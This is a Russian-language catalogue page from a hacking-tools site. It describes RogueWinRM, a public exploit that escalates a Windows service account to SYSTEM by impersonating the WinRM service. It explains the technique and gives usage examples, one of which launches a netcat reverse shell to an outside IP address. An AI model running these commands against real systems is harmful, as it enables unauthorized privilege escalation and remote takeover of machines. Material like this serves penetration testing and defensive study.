Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RogueWinRM — Повышение привилегий на локальном уровне в Windows от учетной записи службы до System | Kitploit
Инструменты/GitHubGitHub/antoniococo/roguewinrm
Повышение привилегийЭксплуатацияТестирование на Проникновение
GitHubantoniococo/roguewinrm

RogueWinRM

Повышение привилегий на локальном уровне в Windows от учетной записи службы до System

Репозиторий
96411226 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RogueWinRM

RogueWinRM — это эксплойт для локального повышения привилегий, который позволяет подняться от учётной записи службы (с привилегией SeImpersonatePrivilege) до учётной записи Local System, если служба WinRM не запущена (по умолчанию на Win10, но НЕ на Windows Server 2019).

Кратко: он прослушивает входящие соединения на порту 5985, имитируя настоящую службу WinRM.
Это всего лишь минимальный веб-сервер, который пытается согласовать NTLM-аутентификацию с любым сервисом, пытающимся подключиться к этому порту.
Затем запускается служба BITS (работающая как Local System), и она попытается аутентифицироваться на нашем подставном слушателе. После успешной аутентификации мы можем выполнить олицетворение пользователя Local System и запустить произвольный процесс с этими привилегиями.

Полное техническое описание этой уязвимости можно найти по ссылке --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

Usage

root@kitploit:~
RogueWinRM

Mandatory args:
-p <program>: program to launch

Optional args:
-a <argument>: command line argument to pass to program (default NULL)
-l <port>: listening port (default 5985 WinRM)
-d : Enable Debugging output

Examples

RogueWinRM

Запуск интерактивной командной строки:

root@kitploit:~
RogueWinRM.exe -p C:\windows\system32\cmd.exe

Запуск реверс-шелла через netcat:

root@kitploit:~
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"

Авторы

  • Antonio Cocomazzi
  • Andrea Pierini
  • Roberto (0xea31)
Скачать инструмент